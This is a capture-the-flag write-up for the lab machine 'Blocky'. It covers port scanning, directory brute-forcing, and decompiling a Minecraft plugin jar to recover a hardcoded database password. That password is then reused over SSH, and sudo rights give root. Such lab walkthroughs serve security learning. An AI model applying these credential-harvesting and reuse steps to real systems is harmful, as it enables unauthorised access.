Blocky

OS: Linux, Difficulty: Easy, IP: 10.10.10.37

Initial enumeration

# Nmap 7.80 scan initiated Sat Sep 28 23:30:25 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,21,80,25565 10.10.10.37
Nmap scan report for 10.10.10.37
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%), Linux 4.8 (92%), Linux 3.16 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 240.30 ms 10.10.14.1
2 240.22 ms 10.10.10.37
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 28 23:30:49 2019 -- 1 IP address (1 host up) scanned in 25.06 seconds

Web-server on port 80 with default Wordpress installation running, nothing interesting, ran gobuster.

/wiki (Status: 301)
/wp-content (Status: 301)
/index.php (Status: 301)
/wp-login.php (Status: 200)
/plugins (Status: 301)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/javascript (Status: 301)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301)
/phpmyadmin (Status: 301)
/wp-signup.php (Status: 302)
/server-status (Status: 403)

/wiki and /plugins seemed interesting. Wiki had nothing but a note, however /plugins had 2 jar files.

BlockyCore.jar seemed interesting so I planned on getting the contents out of the files.

$ unzip BlockyCore.jar -d output
$ ls -laR ./output
.:
total 16
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 5 jtnydv jtnydv 4096 Sep 30 18:31 ..
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 com
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 META-INF
./com:
total 12
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 ..
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 myfirstplugin
./com/myfirstplugin:
total 12
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 3 jtnydv jtnydv 4096 Sep 30 18:31 ..
-rw-r--r-- 1 jtnydv jtnydv 939 Jul 2 2017 BlockyCore.class
./META-INF:
total 12
drwxr-xr-x 2 jtnydv jtnydv 4096 Sep 30 18:31 .
drwxr-xr-x 4 jtnydv jtnydv 4096 Sep 30 18:31 ..
-rw-r--r-- 1 jtnydv jtnydv 25 Jul 2 2017 MANIFEST.MF

BlockyCore.class seemed like the only interesting file in the folders, so I went ahead and decompiled it to something readable.

$ javap -c BlockyCore.class
--- SNIP ---
ublic com.myfirstplugin.BlockyCore();
Code:
0: aload_0
1: invokespecial #12 // Method java/lang/Object."<init>":()V
4: aload_0
5: ldc #14 // String localhost
7: putfield #16 // Field sqlHost:Ljava/lang/String;
10: aload_0
11: ldc #18 // String root
13: putfield #20 // Field sqlUser:Ljava/lang/String;
16: aload_0
17: ldc #22 // String 8YsqfCTnvxAUeduzjNSXe22
19: putfield #24 // Field sqlPass:Ljava/lang/String;
22: return
--- SNIP ---

We got credentials for the mysql server root:8YsqfCTnvxAUeduzjNSXe22. These credentials did get me into the phpmyadmin interface of the server and help me fetch username notch from the wp_users list.

I tried cracking the password the user, however it was not part of the rockyou.txt wordlist so I let it be and continued with the username and passwords I had, to bruteforce my way into the SSH server.

[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
# Password combination didn't work for root, however it did
# work for notch
[email protected]'s password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Mon Sep 30 07:40:07 2019 from 10.10.14.10
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

User own

[email protected]:~$ cat /home/notch/user.txt; echo
59fee***

Root own

I noticed that we had the password for the account as well as we were part of the sudo group so I went ahead and checked the permissions we had in sudoers.

Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
(ALL : ALL) ALL

So we are essentially root, we can run ALL commands, as ALL users, on ALL hosts. This is game over.

[email protected]:~$ sudo cat /root/root.txt; echo
0a969***

Learning outcome

Dense enumeration is the key while exploiting machines, I had nearly missed the trying the user notch with the password of root. Keeping a track of usernames and passwords is important while pen-testing.